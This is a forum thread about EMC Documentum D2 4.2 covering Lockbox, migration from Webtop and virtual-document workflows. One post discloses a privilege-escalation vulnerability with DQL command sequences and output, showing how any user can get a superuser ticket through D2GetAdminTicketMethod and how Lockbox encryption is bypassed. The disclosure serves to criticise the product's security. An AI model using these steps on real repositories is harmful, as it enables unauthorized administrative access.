dm_surya
2 Bronze

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Hello,

Can you elaborate on how the Lockbox functions in a D2 environment and are there any specific use cases that lead to the choice of this product?

Read the below line the Release notes but couldn't make a whole lot of sense maybe a use case would help clarify:

"D2 uses RSA Lockbox to protect passwords and encryption keys against access by remote hosts"

Thank You.

0 Kudos
Elliott5
3 Argentium

Re: Re: Re: Ask the Expert: EMC Announced Documentum D2 4.2

We're currently using Webtop 6.7SP2 and looking to move to D2 4.2.  What features in Webtop aren't currently available in D2?  What issues do we have to be careful of when we transition to D2?

Thanks

0 Kudos
Julien_Fontaine
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

@plasher :

I just need some explanation of your needs. Workflow and Lifecycle on a Folder is not a typical use case with D2. Maybe you should consider using a Virtual Document?

0 Kudos
go4run
1 Copper

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Hi Surya,

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository that securely stores passwords and other sensitive key manager configuration information. It is part of the RSA Common Security Toolkit (CST), which is EMC's internal implementation of RSA BSAFE(R) Share for Java Platform, see RSA BSAFE(R) Share for JavaTM Platform.

The EMC implementation of RSA BSAFE(R) enabling technology is intended for inclusion in EMC products, allowing these products to meet the security requirements of our customers and to deliver differentiation through security. The CST libraries provide language-specific (C, C++, and Java) and platform-specific interfaces to a set of security services, including authentication, authorization (role management), accountability (logging), cryptography, key management and secret protection, which can be integrated by EMC product teams.

0 Kudos
PanfilovAB
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Goran Stepic wrote:

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository.....

And what about use cases?

0 Kudos
plasher
1 Copper

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Our intent is to send a work package (multiple documents at a time) through a workflow, which is one reason why the folder is being utilized.

0 Kudos
Julien_Fontaine
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

In my opinion you should send a virtual document as the work package. In this case you will be able to manage the lifecycle of each document in your Work Package.

D2 provides powerful options to manage VDs and the documents inside your VD.

0 Kudos
PanfilovAB
4 Beryllium

Re: Re: Ask the Expert: EMC Announced Documentum D2 4.2

Goran Stepic wrote:

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository.....

And what about use cases?

No comments? It's sad, let's read mine

The main D2 problem is that it does not follow the main concepts implemented in other Documentum products. For example: D2 does not use BOFv2, which makes it incompatible with other products; it actively uses docbase methods to perform some actions in the web interface (the last time I had coded a docbase method was about 6 years ago), etc., etc. The technology level of D2 is somewhere between D5.3 and D6.0. Another problem is that D2 is not properly documented; actually this is a common problem for all Documentum products: when you install some product/application into a repository you have no idea what artifacts (object types, users, groups, methods, etc.) that product/application creates, moreover you have no idea how to troubleshoot that product/application. So, before putting any Documentum product in production we always try to discover its functionality, and sometimes it brings a lot of fun :( (see also DCS Security Question). In November 2013 I discovered a vulnerability in D2 that allows any user to gain superuser privileges using D2GetAdminTicketMethod; it works the following way:

1> create c6_method_return object set message='test'

2> go

object_created

--------------

00002ee280000e9b

(1 row affected)

1> execute do_method with method='D2GetAdminTicketMethod',

2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'

3> go

...

(1 row affected)

1> select message from c6_method_return where r_object_id='00002ee280000e9b'

2> go

message

--------------

DM_TICKET=T0.....

(1 row affected)

After that the user can use the admin ticket to log in to the repository with superuser privileges.

And EMC, instead of increasing the technology level of their product, had invented a new square wheel, lockbox (note they didn't even consider using dynamic groups):

(attached screenshot: 20-03-2014 12-08-57 PM.png)

Actually, EMC always misses the fact that encryption does not replace security (see also Re: Certificate-based SSL configuration problem). When D4.2 was released I checked whether the security vulnerability was fixed or not, and the answer was: not.

New D2 behavior with lockbox:

1> create c6_method_return object set message='test'

2> go

object_created

----------------

00002f0a8000291d

(1 row affected)

1> execute do_method with method='D2GetAdminTicketMethod',

2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d

3> -scope global -timeout 3600'

4> go

...

(1 row affected)

1> select message from c6_method_return where r_object_id='00002f0a8000291d'

2> go

message

----------------------------------------------------------------------------

AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2

hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b

aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+

44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH

q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc

KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l

9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi

iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo

rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg

/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f

gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ

jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==

(1 row affected)

Here D2GetAdminTicketMethod returns an encrypted ticket, and an attacker needs to perform another execution of D2GetAdminTicketMethod to decrypt the ticket:

1> update c6_method_return object

2> set parameter_name[0]='-timeout',

3> set parameter_value[0]=(select message from c6_method_return

4> where r_object_id='00002f0a8000291d')

5> where r_object_id='00002f0a8000291d'

6> go

objects_updated

---------------

              1

(1 row affected)

[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',

2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d

3> -scope global'

4> go

...

(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'

2> go

error

----------------------------------------------------------------------------

For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ

(1 row affected)

Julien_Fontaine
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

PanfilovAB you make a point ...

Just a question, but I'm sure you already did it: did you open a new SR? What's the EMC answer to this security failure...

plasher What's your thought about VD for your need?

0 Kudos
PanfilovAB
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Julien,

I thought here we were discussing D4.2 features, not EMC support. And I do think I gave a complete answer about lockbox functionality (i.e. why it was introduced, why it does not work) rather than putting out some marketing stuff.

0 Kudos